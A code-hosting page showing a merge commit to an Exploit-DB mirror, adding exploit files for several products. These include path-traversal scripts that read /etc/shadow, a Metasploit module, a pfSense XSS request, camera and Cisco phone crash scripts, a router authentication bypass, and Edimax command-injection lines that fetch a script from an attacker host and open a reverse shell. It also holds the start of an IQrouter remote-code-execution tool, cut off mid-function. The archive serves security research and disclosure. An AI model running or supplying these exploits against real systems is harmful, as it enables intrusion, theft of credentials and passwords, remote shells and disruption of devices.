bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge branch 'upstream-master' into misc

Browse source 
* upstream-master:
  DB: 2020-04-25
  DB: 2020-04-24
  DB: 2020-04-23
  DB: 2020-04-22
  DB: 2020-04-21
  DB: 2020-04-18
  DB: 2020-04-17
  DB: 2020-04-16
  DB: 2020-04-15
  DB: 2020-04-14
  Fix bash script
  DB: 2020-04-11
  Remove debug command
  Fix a few grammar mistakes
  DB: 2020-04-09
  DB: 2020-04-08
  DB: 2020-04-07
  Fix apt install of exploitdb-{bin-sploits/papers}

# Conflicts:
#	searchsploit
This commit is contained in:
g0tmi1k 2020-04-27 20:20:04 +01:00
commit 23e40674cb
96 changed files with 13520 additions and 34 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

31
exploits/cgi/webapps/48308.py Executable file
View file

@ -0,0 +1,31 @@
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to discover users' passwords
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive
# information.
import requests
import sys
if len(sys.argv) <2:
print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
sys.exit(-1)
else:
files=sys.argv[2]
url=sys.argv[1]
with requests.session() as s:
urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
response = s.get(urlz, auth=('admin', 'admin'), verify=False)
txt=response.text
print(response.text)

83
exploits/cgi/webapps/48373.rb Executable file
View file

@ -0,0 +1,83 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Zen Load Balancer Directory Traversal",
'Description' => %q{
This module exploits a authenticated directory traversal
vulnerability in Zen Load
Balancer `v3.10.1`. The flaw exists in 'index.cgi' not
properly handling 'filelog='
parameter which allows a malicious actor to load arbitrary file path.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Basim Alabdullah', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'References' =>
[
['EDB', '48308']
],
'DisclosureDate' => "Apr 10 2020"
))
register_options(
[
Opt::RPORT(444),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptInt.new('DEPTH', [true, 'The max traversal depth', 16]),
OptString.new('FILEPATH', [false, 'The name of the file to
download', '/etc/passwd']),
OptString.new('TARGETURI', [true, "The base URI path of the
ZenConsole install", '/']),
OptString.new('HttpUsername', [true, 'The username to use for
the HTTP server', 'admin']),
OptString.new('HttpPassword', [false, 'The password to use for
the HTTP server', 'admin'])
])
end
def run_host(ip)
filename = datastore['FILEPATH']
traversal = "../" * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.cgi'),
'vars_get'=>
{
'id' => '2-3',
'filelog' => "#{traversal}#{filename}",
'nlines' => '100',
'action' => 'See logs'
},
'authorization' =>
basic_auth(datastore['HttpUsername'],datastore['HttpPassword'])
}, 25)
unless res && res.code == 200
print_error('Nothing was downloaded')
return
end
print_good("#{peer} - Downloaded #{res.body.length} bytes")
path = store_loot(
'zenload.http',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end

39
exploits/freebsd/webapps/48300.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.pfsense.org
# Version: PfSense 2.4.4-P3
# Tested on: FreeBSD 11.2-RELEASE-p10
# CVE : CVE-2020-11457
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr
# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.
POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save

153
exploits/hardware/webapps/48304.py Executable file
View file

@ -0,0 +1,153 @@
# Exploit Title: Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)
# Date: 2020-04-07
# Exploit Author: Jacob Baines
# Vendor Homepage: https://amcrest.com/
# Software Link: https://amcrest.com/firmwaredownloads
# Version: Many different versions due to number of Dahua/Amcrest/etc
# devices affected
# Tested on: Amcrest IP2M-841 2.420.AC00.18.R and AMDVTENL8-H5
# 4.000.00AC000.0
# CVE : CVE-2020-5735
# Advisory: https://www.tenable.com/security/research/tra-2020-20
# Amcrest & Dahua NVR/Camera Port 37777 Authenticated Crash
import argparse
import hashlib
import socket
import struct
import sys
import md5
import re
## DDNS test functionality. Stack overflow via memcpy
def recv_response(sock):
# minimum size is 32 bytes
header = sock.recv(32)
# check we received enough data
if len(header) != 32:
print 'Invalid response. Too short'
return (False, '', '')
# extract the payload length field
length_field = header[4:8]
payload_length = struct.unpack_from('I', length_field)
payload_length = payload_length[0]
# uhm... lets be restrictive of accepted lengths
if payload_length < 0 or payload_length > 4096:
print 'Invalid response. Bad payload length'
return (False, header, '')
if (payload_length == 0):
return (True, header, '')
payload = sock.recv(payload_length)
if len(payload) != payload_length:
print 'Invalid response. Bad received length'
return (False, header, payload)
return (True, header, payload)
def sofia_hash(msg):
h = ""
m = hashlib.md5()
m.update(msg)
msg_md5 = m.digest()
for i in range(8):
n = (ord(msg_md5[2*i]) + ord(msg_md5[2*i+1])) % 0x3e
if n > 9:
if n > 35:
n += 61
else:
n += 55
else:
n += 0x30
h += chr(n)
return h
top_parser = argparse.ArgumentParser(description='lol')
top_parser.add_argument('-i', '--ip', action="store", dest="ip",
required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port",
type=int, help="The port to connect to", default="37777")
top_parser.add_argument('-u', '--username', action="store",
dest="username", help="The user to login as", default="admin")
top_parser.add_argument('--pass', action="store", dest="password",
required=True, help="The password to use")
args = top_parser.parse_args()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"
# send the old style login request. We'll use blank hashes. This should
# trigger a challenge from new versions of the camera
old_login = ("\xa0\x05\x00\x60\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" + # username hash
"\x00\x00\x00\x00\x00\x00\x00\x00" + # password hash
"\x05\x02\x00\x01\x00\x00\xa1\xaa")
sock.sendall(old_login)
(success, header, challenge) = recv_response(sock)
if success == False or not challenge:
print 'Failed to receive the challenge'
print challenge
sys.exit(0)
# extract the realm and random seed
seeds = re.search("Realm:(Login to [A-Za-z0-9]+)\r\nRandom:([0-9]+)\r\n",
challenge)
if seeds == None:
print 'Failed to extract realm and random seed.'
print challenge
sys.exit(0)
realm = seeds.group(1)
random = seeds.group(2)
# compute the response
realm_hash = md5.new(args.username + ":" + realm + ":" +
args.password).hexdigest().upper()
random_hash = md5.new(args.username + ":" + random + ":" +
realm_hash).hexdigest().upper()
sofia_result = sofia_hash(args.password)
final_hash = md5.new(args.username + ":" + random + ":" +
sofia_result).hexdigest().upper()
challenge_resp = ("\xa0\x05\x00\x60\x47\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x05\x02\x00\x08\x00\x00\xa1\xaa" +
args.username + "&&" + random_hash + final_hash)
sock.sendall(challenge_resp)
(success, header, payload) = recv_response(sock)
if success == False or not header:
print 'Failed to receive the session id'
sys.exit(0)
session_id_bin = header[16:20]
session_id_int = struct.unpack_from('I', session_id_bin)
if session_id_int[0] == 0:
print "Log in failed."
sys.exit(0)
session_id = session_id_int[0]
print "[+] Session ID: " + str(session_id)
# firmware version
command = "Protocol: " + ("a" * 0x300) + "\r\n"
command_length = struct.pack("I", len(command))
firmware = ("\x62\x00\x00\x00" + command_length +
"\x04\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
"\x00\x00\x00\x00\x00\x00\x00\x00" +
command)
sock.sendall(firmware)
(success, header, firmware_string) = recv_response(sock)
if success == False and not header:
print "[!] Probably crashed the server."
else:
print "[+] Attack failed."

51
exploits/hardware/webapps/48310.txt Normal file
View file

@ -0,0 +1,51 @@
# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A
#POC:
The default password of this router is the last 8 characters of the
device's serial number which exist in the back of the device.
An attacker can leak the serial number via the web app API like the
following:
************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm
************************Response************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141
while(1); /*{"DeviceName":"HG630
V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/
You can use that serial number to login to the router.
#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc

43
exploits/hardware/webapps/48311.py Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085
import sys
import requests
import os
import time
if len(sys.argv) !=4:
print " "
print "Usage : python exploit.py url filename outputname"
print "Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini"
print " "
else:
traversal = "../../../../../../../../../../../../../"
filename = sys.argv[2]
url = sys.argv[1]+traversal+filename
outputname = sys.argv[3]
content = requests.get(url)
if content.status_code == 200:
print " "
print "Directory Traversal Succeeded"
time.sleep(3)
print " "
print "Saving Output"
os.system("touch " + outputname)
output_write = open(outputname,"r+")
output_write.write(content.text)
output_write.close()
else:
print "Host not vulnerable to Directory Traversal!"

42
exploits/hardware/webapps/48318.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution
# Date: 2020-04-13
# Exploit Author: Wadeek
# Hardware Version: EW-7438RPn-v3 Mini
# Firmware Version: 1.23 / 1.27
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip
== Shodan Dorks ==
(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp"
(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234"
== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) ==
GET /wizard_reboot.asp
showSSID = "<WIRELESS-NAME>";
document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>');
== Command Execution * ==
(Setup Mode)
curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'
(Unsetup Mode with default password)
curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh'
== Cross-Site Request Forgery -> Command Execution * ==
<form action="http://edimaxext.setup/goform/mp" method="POST">
<input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh">
<input type="submit" value="">
</form>
* [ delivery.sh ]
--------------------------------------------------------------------------------------
# (msfvenom) linux/mipsbe/shell/reverse_tcp
cd /tmp/
busybox wget -O reverse http://<LHOST>/reverse
busybox chmod +x reverse
./reverse &
--------------------------------------------------------------------------------------

13
exploits/hardware/webapps/48342.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
# Date: 2020-04-15
# Exploit Author: Jacob Baines
# Vendor Homepage: https://www.cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
# Version: Before 11.7(1)
# Tested on: Cisco Wireless IP Phone 8821
# CVE: CVE-2020-3161
# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24
curl -v --path-as-is --insecure
https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

339
exploits/hardware/webapps/48358.py Executable file
View file

@ -0,0 +1,339 @@
# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A
#!/usr/bin/env python3
import argparse
from sys import argv, exit
try:
import requests
except ImportError:
print("Install requests lib! pip3 install requests")
print("""
#######################################################################
# IQrouter multiple RCE and other vulnerabilities #
# by drakylar (Shaposhnikov Ilya) #
# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
# CVE-2020-11967 CVE-2020-11968 #
#######################################################################
""")
rce_setup = [
[
"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
"RCE /vlanTag (vlan_tag param)"
],
[
"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
"RCE /screen9 (s2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
"RCE /screen9 (s1 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
"RCE /screen9 (p2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
"RCE /screen9 (p1 param)"
],
[
"/cgi-bin/luci/er/screen4?save_isp='`{}`",
"RCE /screen4 (save_isp param)"
],
[
"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
"RCE /screen2 set_wan_modem_interfaces param)"
],
[
"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
"RCE /screen2 find_ip_address_conflict param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
"RCE /screen10 (set_security_question param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
"RCE /screen10 (set_security_answer param)"],
[
"/cgi-bin/luci/er/screen1?zonename='`{}`'",
"RCE /screen1 (zonename param)"
],
[
"/cgi-bin/luci/er/register?email=`{}`",
"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
]
]
rce_any = [
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
"RCE /wifi (s2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
"RCE /wifi (s1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
"RCE /wifi (p2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
"RCE /wifi (p1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_5g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_2g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guest_key param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
"RCE /wifi (enable_guestwifi param)"
],
[
"/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123",
"RCE /screen11.1 (email param)"
],
[
"/cgi-bin/luci/er/reboot_link?link='`{}`'",
"RCE /reboot_link (link param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
"RCE /diag_wifi (htm5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
"RCE /diag_wifi (htm2ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
"RCE /diag_wifi (c5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
"RCE /diag_wifi (c2ghz param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
"RCE /diag_set_static_wan (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
"RCE /diag_set_static_wan (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
"RCE /diag_set_static_wan (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
"RCE /diag_set_static_wan (dns param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
"RCE /diag_set_static_modem (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
"RCE /diag_set_static_modem (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
"RCE /diag_set_static_modem (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
"RCE /diag_set_device_name_and_sync (device_name param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
"RCE /diag_set_device_name (device_name param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
"RCE /diag_pppoe_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
"RCE /diag_pppoe_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
"RCE /diag_pppoe (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
"RCE /diag_pppoe (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
"RCE /diag_pppoa_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
"RCE /diag_pppoa_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
"RCE /diag_pppoa (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
"RCE /diag_pppoa (wan_password param)"
],
[
"/cgi-bin/luci/er/advanced_link?link='`{}`'",
"RCE /advanced_link (link param)"
]
]
advanced_payloads = [
[
"/cgi-bin/luci/er/reboot_link?reboot=1",
"Reboot IQrouter (/reboot_link reboot param))"
],
[
"/cgi-bin/luci/er/screen2?reboot=1",
"Reboot IQrouter (/screen2 reboot param))"
],
[
"/cgi-bin/luci/er/index?reset_config=1",
"Reset IQrouter (/index reset_config param)"
],
[
"/cgi-bin/luci/er/screen7?upgrade=1",
"Upgrade IQrouter (/screen7 upgrade param)"
],
[
"/cgi-bin/luci/er/vlanTag?restart_network=1",
"Restart network (/vlanTag restart_network param)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/start",
"Start iperf script (/diag_iperf_cmd/start)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/stop",
"Stop iperf script (/diag_iperf_cmd/stop)"
],
[
"/cgi-bin/luci/er/get_syslog",
"Router setup info log (/get_syslog)"
],
[
"/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
"Change root password to c00lpasswd (can change in code)"
],
[
"/cgi-bin/luci/er/reset_password/",
"Change root password to 'changeme' (static)"
]
]
def print_payloads():
print('#' * 30)
print("Payloads list")
num = 1
print('######################### RCE without auth ########################')
for payload in rce_any:
